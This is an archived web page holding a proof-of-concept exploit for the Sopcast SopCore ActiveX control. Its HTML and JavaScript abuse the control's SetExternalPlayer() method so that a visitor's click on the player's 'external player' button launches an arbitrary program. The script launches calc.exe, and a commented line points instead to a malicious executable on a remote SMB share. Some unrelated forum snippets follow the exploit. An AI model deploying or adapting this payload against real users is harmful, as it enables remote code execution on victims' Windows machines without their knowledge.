Sopcast SopCore Control (sopocx.ocx 3.0.3.501) SetExternalPlayer() user assisted remote code execution poc



<!-- Sopcast SopCore Control (sopocx.ocx 3.0.3.501) SetExternalPlayer()
user assisted remote code execution poc
by Nine:Situations:Group::surfista (IE7/8)

our site: http://retrogod.altervista.org/
software site: http://www.sopcast.org/

Through the SetExternalPlayer() method and the ExternalPlayer property
is possible to associate an arbitrary executable to the "external player"
button (for clearness see http://www.sopcast.com/docs/ where the player
control buttons are showed) which opens Windows Media Player by default.
When the user click this button, the executable is launched without prompts
Also this value is stored in config.xml, inside the sopcast local folder
for further use, ex. with the sopcast client application
Note: this control is safe for scripting and safe for initialization
-->
<HTML>
<HEAD>
<script language="Javascript" type="text/JavaScript">
window.onload=function()
{
SopPlayer.InitPlayer();
//SopPlayer.SetExternalPlayer("\\\\192.168.0.1\\c$\\PATH\\TO\\MALICIOUS_PROGRAM.EXE");
SopPlayer.SetExternalPlayer("c:\\WINDOWS\\system32\\calc.exe");
SopPlayer.SetSopAddress("sop://broker.sopcast.com:3912/6002"); //A LIVE CHANNEL ...
SopPlayer.SetChannelName("CCTV5");
SopPlayer.Play();
}
</script>
</HEAD>
<BODY>
<OBJECT
ID="SopPlayer"
name="SopPlayer"
CLASSID=clsid:8FEFF364-6A5F-4966-A917-A3AC28411659
HEIGHT=375
WIDTH=375>
</OBJECT>
</BODY>
</HTML>

original url: http://retrogod.altervista.org/9sg_sopcastia.html



Relevant Pages

  • RealNetworks RealGames StubbyUtil.ShellCtl.1 ActiveX Control (InstallerDlg.dll v2.6.0.445) Multiple
    ... RealNetworks RealGames StubbyUtil.ShellCtl.1 ActiveX Control ... Multiple Remote Commands Execution ... CreateShortcut-> allows to create arbitrary executable files inside the automatic ... ProductName: InstallerDlg Module ...
    (Bugtraq)
  • Re: how to turn off NX bit in assembly?
    ... code using the faults to stop execution in an additional controlled ... Instead of unmapping and flush a page upon a page fault and loading another ... one could terminate the program at that point. ... they could interrupt on flow control. ...
    (alt.lang.asm)
  • Re: how to turn off NX bit in assembly?
    ... code using the faults to stop execution in an additional controlled ... one could terminate the program at that point. ... probably look at the debug registers to see what control of code they ... the ACPI doesn't distinguish apps ...
    (alt.lang.asm)
  • Re: Debugging Challenge - no source available
    ... transparent backgrounds - I previously noticed some bizarre behavior when I ... tried to set a control's background to a transparent bitmap (the transparent ... I've decided to derive my own control from the label control I'm ... >> In both cases, the debugger catches execution at the same point, just ...
    (microsoft.public.dotnet.general)
  • Re: Can I overwrite a calculated query field?
    ... click on the textbox control that you want to do this ... > for "execution" which was linked to a default rate times ... > charge" in your table) ... >>which could be a calculation based on what type of trade ...
    (microsoft.public.access.tablesdbdesign)